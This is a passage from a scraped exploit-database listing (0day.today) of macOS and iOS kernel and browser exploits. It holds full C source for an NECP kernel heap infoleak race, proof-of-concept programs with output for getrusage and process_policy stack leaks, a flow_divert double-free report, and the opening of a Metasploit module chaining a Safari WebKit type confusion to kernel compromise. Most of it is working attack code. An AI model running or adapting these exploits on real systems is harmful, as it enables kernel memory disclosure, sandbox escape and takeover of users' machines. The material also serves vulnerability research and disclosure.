/* kernel control protocol */\r\n \r\n#define AF_SYS_CONTROL 2 /* corresponding sub address type */\r\n \r\n// ---- Definitions from sys/kern_control.h -------------------------------------------------------\r\n \r\n#define CTLIOCGINFO _IOWR('N', 3, struct ctl_info) /* get id from name */\r\n \r\n#define MAX_KCTL_NAME 96\r\n \r\nstruct ctl_info {\r\n u_int32_t ctl_id; /* Kernel Controller ID */\r\n char ctl_name[MAX_KCTL_NAME]; /* Kernel Controller Name (a C string) */\r\n};\r\n \r\nstruct sockaddr_ctl {\r\n u_char sc_len; /* depends on size of bundle ID string */\r\n u_char sc_family; /* AF_SYSTEM */\r\n u_int16_t ss_sysaddr; /* AF_SYS_KERNCONTROL */\r\n u_int32_t sc_id; /* Controller unique identifier */\r\n u_int32_t sc_unit; /* Developer private unit number */\r\n u_int32_t sc_reserved[5];\r\n};\r\n \r\n#endif /* __x86_64__ */\r\n \r\n// ---- Definitions from bsd/net/necp.h -----------------------------------------------------------\r\n \r\n#define NECP_CONTROL_NAME \"com.apple.net.necp_control\"\r\n \r\n// ---- Macros ------------------------------------------------------------------------------------\r\n \r\n#if DEBUG\r\n#define DEBUG_TRACE(fmt, ...) printf(fmt\"\\n\", ##__VA_ARGS__)\r\n#else\r\n#define DEBUG_TRACE(fmt, ...)\r\n#endif\r\n \r\n#define ERROR(fmt, ...) printf(\"Error: \"fmt\"\\n\", ##__VA_ARGS__)\r\n \r\n// ---- Kernel heap infoleak ----------------------------------------------------------------------\r\n \r\n// A callback block that will be called each time kernel data is leaked. leak_data and leak_size\r\n// are the kernel data that was leaked and the size of the leak. This function should return true\r\n// to finish and clean up, false to retry the leak.\r\ntypedef bool (^kernel_leak_callback_block)(const void *leak_data, size_t leak_size);\r\n \r\n// Open the control socket for com.apple.necp. Requires root privileges.\r\nstatic bool open_necp_control_socket(int *necp_ctlfd) {\r\n int ctlfd = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);\r\n if (ctlfd < 0) {\r\n ERROR(\"Could not create a system control socket: errno %d\", errno);\r\n return false;\r\n }\r\n struct ctl_info ctlinfo = { .ctl_id = 0 };\r\n strncpy(ctlinfo.ctl_name, NECP_CONTROL_NAME, sizeof(ctlinfo.ctl_name));\r\n int err = ioctl(ctlfd, CTLIOCGINFO, &ctlinfo);\r\n if (err) {\r\n close(ctlfd);\r\n ERROR(\"Could not retrieve the control ID number for %s: errno %d\",\r\n NECP_CONTROL_NAME, errno);\r\n return false;\r\n }\r\n struct sockaddr_ctl addr = {\r\n .sc_len = sizeof(addr),\r\n .sc_family = AF_SYSTEM,\r\n .ss_sysaddr = AF_SYS_CONTROL,\r\n .sc_id = ctlinfo.ctl_id, // com.apple.necp\r\n .sc_unit = 0, // Let the kernel pick the control unit.\r\n };\r\n err = connect(ctlfd, (struct sockaddr *)&addr, sizeof(addr));\r\n if (err) {\r\n close(ctlfd);\r\n ERROR(\"Could not connect to the NECP control system (ID %d) \"\r\n \"unit %d: errno %d\", addr.sc_id, addr.sc_unit, errno);\r\n return false;\r\n }\r\n *necp_ctlfd = ctlfd;\r\n return true;\r\n}\r\n \r\n// Allocate a virtual memory region at the address pointed to by map_address. If map_address points\r\n// to a NULL address, then the allocation is created at an arbitrary address which is stored in\r\n// map_address on return.\r\nstatic bool allocate_map_address(void **map_address, size_t map_size) {\r\n mach_vm_address_t address = (mach_vm_address_t) *map_address;\r\n bool get_address = (address == 0);\r\n int flags = (get_address ? VM_FLAGS_ANYWHERE : VM_FLAGS_FIXED);\r\n kern_return_t kr = mach_vm_allocate(mach_task_self(), &address, map_size, flags);\r\n if (kr != KERN_SUCCESS) {\r\n ERROR(\"Could not allocate virtual memory: mach_vm_allocate %d: %s\",\r\n kr, mach_error_string(kr));\r\n return false;\r\n }\r\n if (get_address) {\r\n *map_address = (void *)address;\r\n }\r\n return true;\r\n}\r\n \r\n// Deallocate the mapping created by allocate_map_address.\r\nstatic void deallocate_map_address(void *map_address, size_t map_size) {\r\n mach_vm_deallocate(mach_task_self(), (mach_vm_address_t) map_address, map_size);\r\n}\r\n \r\n// Context for the map_address_racer thread.\r\nstruct map_address_racer_context {\r\n pthread_t thread;\r\n volatile bool running;\r\n volatile bool deallocated;\r\n volatile bool do_map;\r\n volatile bool restart;\r\n bool success;\r\n void * address;\r\n size_t size;\r\n};\r\n \r\n// The racer thread. This thread will repeatedly: (a) deallocate the address; (b) spin until do_map\r\n// is true; (c) allocate the address; (d) spin until the main thread sets restart to true or\r\n// running to false. If the thread encounters an internal error, it sets success to false and\r\n// exits.\r\nstatic void *map_address_racer(void *arg) {\r\n struct map_address_racer_context *context = arg;\r\n while (context->running) {\r\n // Deallocate the address.\r\n deallocate_map_address(context->address, context->size);\r\n context->deallocated = true;\r\n // Wait for do_map to become true.\r\n while (!context->do_map) {}\r\n context->do_map = false;\r\n // Do a little bit of work so that the allocation is more likely to take place at\r\n // the right time.\r\n close(-1);\r\n // Re-allocate the address. If this fails, abort.\r\n bool success = allocate_map_address(&context->address, context->size);\r\n if (!success) {\r\n context->success = false;\r\n break;\r\n }\r\n // Wait while we're still running and not told to restart.\r\n while (context->running && !context->restart) {}\r\n context->restart = false;\r\n };\r\n return NULL;\r\n}\r\n \r\n// Start the map_address_racer thread.\r\nstatic bool start_map_address_racer(struct map_address_racer_context *context, size_t leak_size) {\r\n // Allocate the initial block of memory, fixing the address.\r\n context->address = NULL;\r\n context->size = leak_size;\r\n if (!allocate_map_address(&context->address, context->size)) {\r\n goto fail_0;\r\n }\r\n // Start the racer thread.\r\n context->running = true;\r\n context->deallocated = false;\r\n context->do_map = false;\r\n context->restart = false;\r\n context->success = true;\r\n int err = pthread_create(&context->thread, NULL, map_address_racer, context);\r\n if (err) {\r\n ERROR(\"Could not create map_address_racer thread: errno %d\", err);\r\n goto fail_1;\r\n }\r\n return true;\r\nfail_1:\r\n deallocate_map_address(context->address, context->size);\r\nfail_0:\r\n return false;\r\n}\r\n \r\n// Stop the map_address_racer thread.\r\nstatic void stop_map_address_racer(struct map_address_racer_context *context) {\r\n // Exit the thread.\r\n context->running = false;\r\n context->do_map = true;\r\n pthread_join(context->thread, NULL);\r\n // Deallocate the memory.\r\n deallocate_map_address(context->address, context->size);\r\n}\r\n \r\n// Try the NECP leak once. Returns true if the leak succeeded.\r\nstatic bool try_necp_leak(int ctlfd, struct map_address_racer_context *context) {\r\n socklen_t length = context->size;\r\n // Wait for the map to be deallocated.\r\n while (!context->deallocated) {};\r\n context->deallocated = false;\r\n // Signal the racer to do the mapping.\r\n context->do_map = true;\r\n // Try to trigger the leak.\r\n int err = getsockopt(ctlfd, SYSPROTO_CONTROL, 0, context->address, &length);\r\n if (err) {\r\n DEBUG_TRACE(\"Did not allocate in time\");\r\n return false;\r\n }\r\n // Most of the time we end up here: allocating too early. If the first two words are both\r\n // 0, then assume we didn't make the leak. We need the leak size to be at least 16 bytes.\r\n uint64_t *data = context->address;\r\n if (data[0] == 0 && data[1] == 0) {\r\n return false;\r\n }\r\n // WOW! It worked!\r\n return true;\r\n}\r\n \r\n// Repeatedly try the NECP leak, until either we succeed or hit the maximum retry limit.\r\nstatic bool try_necp_leak_repeat(int ctlfd, kernel_leak_callback_block kernel_leak_callback,\r\n struct map_address_racer_context *context) {\r\n const size_t MAX_TRIES = 10000000;\r\n bool has_leaked = false;\r\n for (size_t try = 1;; try++) {\r\n // Try the leak once.\r\n if (try_necp_leak(ctlfd, context)) {\r\n DEBUG_TRACE(\"Triggered the leak after %zu %s!\", try,\r\n (try == 1 ? \"try\" : \"tries\"));\r\n try = 0;\r\n has_leaked = true;\r\n // Give the leak to the callback, and finish if it says we're done.\r\n if (kernel_leak_callback(context->address, context->size)) {\r\n return true;\r\n }\r\n }\r\n // If we haven't successfully leaked anything after MAX_TRIES attempts, give up.\r\n if (!has_leaked && try >= MAX_TRIES) {\r\n ERROR(\"Giving up after %zu unsuccessful leak attempts\", try);\r\n return false;\r\n }\r\n // Reset for another try.\r\n context->restart = true;\r\n }\r\n}\r\n \r\n// Leak kernel heap data repeatedly until the callback function returns true.\r\nstatic bool leak_kernel_heap(size_t leak_size, kernel_leak_callback_block kernel_leak_callback) {\r\n const size_t MIN_LEAK_SIZE = 16;\r\n bool success = false;\r\n if (leak_size < MIN_LEAK_SIZE) {\r\n ERROR(\"Target leak size too small; must be at least %zu bytes\", MIN_LEAK_SIZE);\r\n goto fail_0;\r\n }\r\n int ctlfd;\r\n if (!open_necp_control_socket(&ctlfd)) {\r\n goto fail_0;\r\n }\r\n struct map_address_racer_context context;\r\n if (!start_map_address_racer(&context, leak_size)) {\r\n goto fail_1;\r\n }\r\n if (!try_necp_leak_repeat(ctlfd, kernel_leak_callback, &context)) {\r\n goto fail_2;\r\n }\r\n success = true;\r\nfail_2:\r\n stop_map_address_racer(&context);\r\nfail_1:\r\n close(ctlfd);\r\nfail_0:\r\n return success;\r\n}\r\n \r\n// ---- Main --------------------------------------------------------------------------------------\r\n \r\n// Dump data to stdout.\r\nstatic void dump(const void *data, size_t size) {\r\n const uint8_t *p = data;\r\n const uint8_t *end = p + size;\r\n unsigned off = 0;\r\n while (p < end) {\r\n printf(\"%06x: %02x\", off & 0xffffff, *p++);\r\n for (unsigned i = 1; i < 16 && p < end; i++) {\r\n bool space = (i % 8) == 0;\r\n printf(\" %s%02x\", (space ? \" \" : \"\"), *p++);\r\n }\r\n printf(\"\\n\");\r\n off += 16;\r\n }\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n // Parse the arguments.\r\n if (argc != 2) {\r\n ERROR(\"Usage: %s <leak-size>\", argv[0]);\r\n return 1;\r\n }\r\n char *end;\r\n size_t leak_size = strtoul(argv[1], &end, 0);\r\n if (*end != 0) {\r\n ERROR(\"Invalid leak size '%s'\", argv[1]);\r\n return 1;\r\n }\r\n // Try to leak interesting data from the kernel.\r\n const size_t MAX_TRIES = 50000;\r\n __block size_t try = 1;\r\n __block bool leaked = false;\r\n bool success = leak_kernel_heap(leak_size, ^bool (const void *leak, size_t size) {\r\n // Try to find an kernel pointer in the leak.\r\n const uint64_t *p = leak;\r\n for (size_t i = 0; i < size / sizeof(*p); i++) {\r\n if (p[i] >> 48 == 0xffff) {\r\n dump(leak, size);\r\n leaked = true;\r\n return true;\r\n }\r\n }\r\n#if DEBUG\r\n // Show this useless leak anyway.\r\n DEBUG_TRACE(\"Boring leak:\");\r\n dump(leak, size);\r\n#endif\r\n // If we've maxed out, just bail.\r\n if (try >= MAX_TRIES) {\r\n ERROR(\"Could not leak interesting data after %zu attempts\", try);\r\n return true;\r\n }\r\n try++;\r\n return false;\r\n });\r\n return (success && leaked ? 0 : 1);\r\n}\n\n# 0day.today [2018-03-06] #", "sourceHref": "https://0day.today/exploit/29935", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-04-14T15:50:10", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS getrusage Stack Leak Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13869"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29199", "href": "https://0day.today/exploit/description/29199", "sourceData": "MacOS getrusage stack leak through struct padding \r\n\r\nCVE-2017-13869\r\n\r\n\r\nFor 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:\r\n\r\nint\r\ngetrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)\r\n{\r\n struct rusage *rup, rubuf;\r\n struct user64_rusage rubuf64;\r\n struct user32_rusage rubuf32;\r\n size_t retsize = sizeof(rubuf); /* default: 32 bits */\r\n caddr_t retbuf = (caddr_t)&rubuf; /* default: 32 bits */\r\n struct timeval utime;\r\n struct timeval stime;\r\n\r\n\r\n switch (uap->who) {\r\n case RUSAGE_SELF:\r\n calcru(p, &utime, &stime, NULL);\r\n proc_lock(p);\r\n rup = &p->p_stats->p_ru;\r\n rup->ru_utime = utime;\r\n rup->ru_stime = stime;\r\n\r\n rubuf = *rup;\r\n proc_unlock(p);\r\n\r\n break;\r\n [...]\r\n }\r\n if (IS_64BIT_PROCESS(p)) {\r\n retsize = sizeof(rubuf64);\r\n retbuf = (caddr_t)&rubuf64;\r\n munge_user64_rusage(&rubuf, &rubuf64);\r\n } else {\r\n [...]\r\n }\r\n\r\n return (copyout(retbuf, uap->rusage, retsize));\r\n}\r\n\r\n`munge_user64_rusage()` performs the conversion by copying individual fields:\r\n\r\n__private_extern__ void \r\nmunge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)\r\n{\r\n /* timeval changes size, so utime and stime need special handling */\r\n a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;\r\n a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;\r\n a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;\r\n a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;\r\n[...]\r\n}\r\n\r\n`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:\r\n\r\n#define _STRUCT_USER64_TIMEVAL struct user64_timeval\r\n_STRUCT_USER64_TIMEVAL\r\n{\r\n user64_time_t tv_sec; /* seconds */\r\n __int32_t tv_usec; /* and microseconds */\r\n};\r\n\r\nstruct user64_rusage {\r\n struct user64_timeval ru_utime; /* user time used */\r\n struct user64_timeval ru_stime; /* system time used */\r\n user64_long_t ru_maxrss; /* max resident set size */\r\n[...]\r\n};\r\n\r\nThis padding is not initialized, but is copied to userspace.\r\n\r\n\r\nThe following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.\r\n\r\n\r\nJust leaking stack data from a previous syscall seems to mostly return the upper halfes of some kernel pointers.\r\nThe returned data seems to come from the previous syscall:\r\n\r\n$ cat test.c\r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n printf(\"leak1: 0x%08x\\n\", leak1);\r\n printf(\"leak2: 0x%08x\\n\", leak2);\r\n}\r\n\r\nint main(void) {\r\n do_leak();\r\n do_leak();\r\n do_leak();\r\n int fd = open(\"/dev/null\", O_RDONLY);\r\n do_leak();\r\n int dummy;\r\n read(fd, &dummy, 4);\r\n do_leak();\r\n return 0;\r\n}\r\n$ gcc -o test test.c && ./test\r\nleak1: 0x00000000\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff80\r\nleak2: 0x00000000\r\nleak1: 0xffffff81\r\nleak2: 0x00000000\r\n\r\n\r\nHowever, I believe that this can also be used to disclose kernel heap memory.\r\nWhen the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack\r\nwithout zeroing it, so the new stack contains data from previous heap allocations.\r\nThe following testcase, when run after repeatedly reading a wordlist into memory,\r\nleaks some non-pointer data that seems to come from the wordlist:\r\n\r\n$ cat forktest.c \r\n#include <sys/resource.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <fcntl.h>\r\n#include <unistd.h>\r\n\r\nvoid do_leak(void) {\r\n static struct rusage ru;\r\n getrusage(RUSAGE_SELF, &ru);\r\n static unsigned int leak1, leak2;\r\n memcpy(&leak1, ((char*)&ru)+12, 4);\r\n memcpy(&leak1, ((char*)&ru)+28, 4);\r\n char str[1000];\r\n if (leak1 != 0) {\r\n sprintf(str, \"leak1: 0x%08x\\n\", leak1);\r\n write(1, str, strlen(str));\r\n }\r\n if (leak2 != 0) {\r\n sprintf(str, \"leak2: 0x%08x\\n\", leak2);\r\n write(1, str, strlen(str));\r\n }\r\n}\r\n\r\nvoid leak_in_child(void) {\r\n int res_pid, res2;\r\n asm volatile(\r\n \"mov $0x02000002, %%rax\\n\\t\"\r\n \"syscall\\n\\t\"\r\n : \"=a\"(res_pid), \"=d\"(res2)\r\n :\r\n : \"cc\", \"memory\", \"rcx\", \"<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>\"\r\n );\r\n //write(1, \"postfork\\n\", 9);\r\n if (res2 == 1) {\r\n //write(1, \"child\\n\", 6);\r\n do_leak();\r\n char dummy;\r\n read(0, &dummy, 1);\r\n asm volatile(\r\n \"mov $0x02000001, %rax\\n\\t\"\r\n \"mov $0, %rdi\\n\\t\"\r\n \"syscall\\n\\t\"\r\n );\r\n }\r\n //printf(\"fork=%d:%d\\n\", res_pid, res2);\r\n int wait_res;\r\n //wait(&wait_res);\r\n}\r\n\r\nint main(void) {\r\n for(int i=0; i<1000; i++) {\r\n leak_in_child();\r\n }\r\n}\r\n$ gcc -o forktest forktest.c && ./forktest\r\nleak1: 0x1b3b1320\r\nleak1: 0x00007f00\r\nleak1: 0x65686375\r\nleak1: 0x410a2d63\r\nleak1: 0x8162ced5\r\nleak1: 0x65736168\r\nleak1: 0x0000042b\r\n\r\nThe leaked values include the strings \"uche\", \"c-\\nA\" and \"hase\", which could plausibly come from the wordlist.\r\n\r\n\r\nApart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.\r\n\r\n\r\nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse\r\nor a patch has been made broadly available, the bug report will become\r\nvisible to the public.\r\n\r\n\r\n\r\nFound by: jannh\r\n\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29199", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T09:21:57", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "zdt", "title": "macOS / iOS - Kernel Double Free due to Incorrect API Usage in Flow Divert Socket Option Handling", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-13867"], "modified": "2017-12-12T00:00:00", "id": "1337DAY-ID-29200", "href": "https://0day.today/exploit/description/29200", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1373 \r\n \r\n SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by \r\n \r\n flow_divert_token_set(struct socket *so, struct sockopt *sopt) \r\n \r\n in flow_divert.c. \r\n \r\n The relevant code is: \r\n \r\n error = soopt_getm(sopt, &token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n error = soopt_mcopyin(sopt, token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n ... \r\n \r\n done: \r\n if (token != NULL) { \r\n mbuf_freem(token); \r\n } \r\n \r\n soopt_getm allocates an mbuf. \r\n \r\n soopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code: \r\n \r\n error = copyin(sopt->sopt_val, mtod(m, char *), \r\n m->m_len); \r\n if (error != 0) { \r\n m_freem(m0); \r\n return (error); \r\n } \r\n \r\n This means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin \r\n will free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin \r\n returns an error it also calls mbuf_freem on that same mbuf which soopy_mcopyin already freed. \r\n \r\n mbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing \r\n back to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually \r\n exploit such an issue. \r\n \r\n This PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect \r\n all double frees and this issue is still exploitable with sufficient grooming/cache manipulation. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2 \r\n */ \r\n \r\n // ianbeer \r\n \r\n #if 0 \r\n MacOS/iOS kernel double free due to incorrect API usage in flow divert socket option handling \r\n \r\n SO_FLOW_DIVERT_TOKEN is a socket option on the SOL_SOCKET layer. It's implemented by \r\n \r\n flow_divert_token_set(struct socket *so, struct sockopt *sopt) \r\n \r\n in flow_divert.c. \r\n \r\n The relevant code is: \r\n \r\n error = soopt_getm(sopt, &token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n error = soopt_mcopyin(sopt, token); \r\n if (error) { \r\n goto done; \r\n } \r\n \r\n ... \r\n \r\n done: \r\n if (token != NULL) { \r\n mbuf_freem(token); \r\n } \r\n \r\n soopt_getm allocates an mbuf. \r\n \r\n soopt_mcopyin, which should copyin the data for the mbuf from userspace, has the following code: \r\n \r\n \t\t\terror = copyin(sopt->sopt_val, mtod(m, char *), \r\n \t\t\t m->m_len); \r\n \t\t\tif (error != 0) { \r\n \t\t\t\tm_freem(m0); \r\n \t\t\t\treturn (error); \r\n \t\t\t} \r\n \r\n This means that if the copyin fails, by for example providing an invalid userspace pointer, soopt_mcopyin \r\n will free the mbuf. flow_divert_token_set isn't aware of these semantics and if it sees that soopt_mcopyin \r\n returns an error it also calls mbuf_freem on that same mbuf which soopy_mcopyin already freed. \r\n \r\n mbufs are aggressivly cached but with sufficiently full caches m_freem will eventually fall through to freeing \r\n back to a zalloc zone, and that zone could potentially be garbage collected leading to the ability to actually \r\n exploit such an issue. \r\n \r\n This PoC will just hit a panic inside m_free when it detects a double-free but do note that this cannot detect \r\n all double frees and this issue is still exploitable with sufficient grooming/cache manipulation. \r\n \r\n Tested on MacOS 10.13 (17A365) on MacBookAir5,2\n\n# 0day.today [2018-01-06] #", "sourceHref": "https://0day.today/exploit/29200", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T19:58:35", "description": "Exploit for macOS platform in category dos / poc", "cvss3": {}, "published": "2018-01-12T00:00:00", "type": "zdt", "title": "macOS - process_policy Stack Leak Through Uninitialized Field Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-7154"], "modified": "2018-01-12T00:00:00", "id": "1337DAY-ID-29460", "href": "https://0day.today/exploit/description/29460", "sourceData": "/*\r\nThe syscall\r\nprocess_policy(scope=PROC_POLICY_SCOPE_PROCESS, action=PROC_POLICY_ACTION_GET, policy=PROC_POLICY_RESOURCE_USAGE, policy_subtype=PROC_POLICY_RUSAGE_CPU, attrp=<userbuf>, target_pid=0, target_threadid=<ignored>)\r\ncauses 4 bytes of uninitialized kernel stack memory to be written to userspace.\r\n \r\nThe call graph looks as follows:\r\n \r\nprocess_policy\r\n handle_cpuuse\r\n proc_get_task_ruse_cpu\r\n task_get_cpuusage\r\n [writes scope=1/2/4/0]\r\n [always returns zero]\r\n [writes policyp if scope!=0]\r\n [always returns zero]\r\n copyout\r\n \r\n \r\nIf task_get_cpuusage() set `*scope=0` because none of the flags\r\nTASK_RUSECPU_FLAGS_PERTHR_LIMIT, TASK_RUSECPU_FLAGS_PROC_LIMIT and TASK_RUSECPU_FLAGS_DEADLINE are set in task->rusage_cpu_flags,\r\nproc_get_task_ruse_cpu() does not write anything into `*policyp`, meaning that `cpuattr.ppattr_cpu_attr` in\r\nhandle_cpuuse() remains uninitialized. task_get_cpuusage() and proc_get_task_ruse_cpu() always return zero,\r\nso handle_cpuuse() will copy `cpuattr`, including the unititialized `ppattr_cpu_attr` field, to userspace.\r\n \r\n \r\nTested on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:\r\n \r\n$ cat test.c\r\n*/\r\n \r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <inttypes.h>\r\n \r\nstruct proc_policy_cpuusage_attr {\r\n uint32_t ppattr_cpu_attr;\r\n uint32_t ppattr_cpu_percentage;\r\n uint64_t ppattr_cpu_attr_interval;\r\n uint64_t ppattr_cpu_attr_deadline;\r\n};\r\n \r\nvoid run(void) {\r\n int retval;\r\n struct proc_policy_cpuusage_attr attrs = {0,0,0,0};\r\n asm volatile(\r\n \"mov $0x02000143, %%rax\\n\\t\" // process_policy\r\n \"mov $1, %%rdi\\n\\t\" // PROC_POLICY_SCOPE_PROCESS\r\n \"mov $11, %%rsi\\n\\t\" // PROC_POLICY_ACTION_GET\r\n \"mov $4, %%rdx\\n\\t\" // PROC_POLICY_RESOURCE_USAGE\r\n \"mov $3, %%r10\\n\\t\" // PROC_POLICY_RUSAGE_CPU\r\n \"mov %[userptr], %%r8\\n\\t\"\r\n \"mov $0, %%r9\\n\\t\" // PID 0 (self)\r\n // target_threadid is unused\r\n \"syscall\\n\\t\"\r\n : //out\r\n \"=a\"(retval)\r\n : //in\r\n [userptr] \"r\"(&attrs)\r\n : //clobber\r\n \"cc\", \"memory\", \"rdi\", \"rsi\", \"rdx\", \"r10\", \"r8\", \"r9\"\r\n );\r\n printf(\"retval = %d\\n\", retval);\r\n printf(\"ppattr_cpu_attr = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_attr);\r\n printf(\"ppattr_cpu_percentage = 0x%\"PRIx32\"\\n\", attrs.ppattr_cpu_percentage);\r\n printf(\"ppattr_cpu_attr_interval = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_interval);\r\n printf(\"ppattr_cpu_attr_deadline = 0x%\"PRIx64\"\\n\", attrs.ppattr_cpu_attr_deadline);\r\n}\r\n \r\nint main(void) {\r\n run();\r\n return 0;\r\n}\r\n \r\n/*\r\n$ gcc -Wall -o test test.c\r\n$ ./test\r\nretval = 0\r\nppattr_cpu_attr = 0x1a180ccb\r\nppattr_cpu_percentage = 0x0\r\nppattr_cpu_attr_interval = 0x0\r\nppattr_cpu_attr_deadline = 0x0\r\n \r\nThat looks like the lower half of a pointer or so.\r\n*/\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/29460", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-12-26T09:26:20", "description": "This Metasploit module exploits a type confusion bug in the Javascript Proxy object in WebKit. The DFG JIT does not take into account that, through the use of a Proxy, it is possible to run arbitrary JS code during the execution of a CreateThis operation. This makes it possible to change the structure of e.g. an argument without causing a bailout, leading to a type confusion (CVE-2018-4233). The type confusion leads to the ability to allocate fake Javascript objects, as well as the ability to find the address in memory of a Javascript object. This allows us to construct a fake JSCell object that can be used to read and write arbitrary memory from Javascript. The module then uses a ROP chain to write the first stage shellcode into executable memory within the Safari process and kick off its execution. The first stage maps the second stage macho (containing CVE-2017-13861) into executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake exploit leads to a kernel task port (TFP0) that can read and write arbitrary kernel memory. The processes credential and sandbox structure in the kernel is overwritten and the meterpreter payloads code signature hash is added to the kernels trust cache, allowing Safari to load and execute the (self-signed) meterpreter payload.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "zdt", "title": "Safari Webkit Proxy Object Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4233", "CVE-2017-13861"], "modified": "2019-06-03T00:00:00", "id": "1337DAY-ID-32828", "href": "https://0day.today/exploit/description/32828", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Safari Webkit Proxy Object Type Confusion',\n 'Description' => %q{\n This module exploits a type confusion bug in the Javascript Proxy object in\n WebKit. The DFG JIT does not take into account that, through the use of a Proxy,\n it is possible to run arbitrary JS code during the execution of a CreateThis\n operation. This makes it possible to change the structure of e.g. an argument\n without causing a bailout, leading to a type confusion (CVE-2018-4233).\n\n The type confusion leads to the ability to allocate fake Javascript objects,\n as well as the ability to find the address in memory of a Javascript object.\n This allows us to construct a fake JSCell object that can be used to read\n and write arbitrary memory from Javascript. The module then uses a ROP chain\n to write the first stage shellcode into executable memory within the Safari\n process and kick off its execution.\n\n The first stage maps the second stage macho (containing CVE-2017-13861) into\n executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake\n exploit leads to a kernel task port (TFP0) that can read and write arbitrary\n kernel memory. The processes credential and sandbox structure in the kernel\n is 